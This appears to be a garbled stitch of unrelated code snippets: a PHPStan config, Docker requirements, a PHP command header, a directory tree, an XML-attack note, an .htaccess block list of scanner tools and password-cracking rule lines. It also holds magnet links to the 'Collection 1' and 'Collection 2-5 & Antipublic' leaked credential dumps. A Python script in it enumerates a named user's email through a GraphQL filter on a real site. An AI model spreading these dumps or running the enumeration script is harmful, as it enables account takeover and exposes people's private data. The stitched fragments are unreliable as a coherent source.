What would you need:
- Postgres 9.3, 9.4, 9.5, 9.6 or 10 with cstore_fdw extention (https://github.com/citusdata/cstore_fdw)
- Docker 1.12.6 or higher
- Docker Compose
- Linux machine
Hardware requirements
includes: | |
- vendor/larastan/larastan/extension.neon | |
- vendor/canvural/larastan-strict-rules/rules.neon | |
#- vendor/symplify/phpstan-rules/config/code-complexity-rules.neon | |
- vendor/symplify/phpstan-rules/config/collector-rules.neon | |
- vendor/symplify/phpstan-rules/config/naming-rules.neon | |
- vendor/symplify/phpstan-rules/config/regex-rules.neon | |
- vendor/symplify/phpstan-rules/config/static-rules.neon | |
- vendor/symplify/phpstan-rules/config/services/services.neon | |
- vendor/phpstan/phpstan-strict-rules/rules.neon |
# Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc | |
# These links are already available all over the internet | |
# Also Note, Trying to login into someone else's account without their permission is unethical and illegal | |
# Collection 1 | |
magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce | |
# Collection 2-5 & Antipublic | |
magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce |
What would you need:
Hardware requirements
<?php | |
namespace App\Console\Commands; | |
use Illuminate\Console\Command; | |
use App\Models; | |
use Symfony\Component\Console\Input\InputInterface; | |
use Symfony\Component\Console\Output\OutputInterface; | |
use serhatozles\compressio\CompressorIO; |
import itertools, argparse, requests, string | |
def generator(prefix): | |
for pass_tuple in itertools.product(ALPHABET, repeat=1): | |
yield prefix + ''.join(pass_tuple) | |
def validator(password): | |
data = {"query": "{users(where: {username: \"" + USERNAME + "\", email_starts_with: \"" + password + "\"}) {username}}"} | |
r = requests.post('https://api.modxclub.ru/', stream=True, json = data) | |
return r.status_code == 200 and r.text == '{"data":{"users":[{"username":"' + USERNAME +'"}]}}' |
public/ | |
├── core | |
│ ├── cache | |
│ │ ├── lexicon_topics | |
│ │ │ └── lexicon | |
│ │ │ └── ru | |
│ │ │ └── core | |
│ │ │ └── login.cache.php | |
│ │ ├── registry | |
│ │ │ └── state |
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
#Script kiddie blocker start | |
RewriteEngine On | |
<IfModule mod_rewrite.c> | |
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR] |
i6 | |
i7 | |
i4 | |
i5 | |
i8 | |
i3 | |
s_ | |
[ i5 | |
$+ R6 R6 | |
i9 |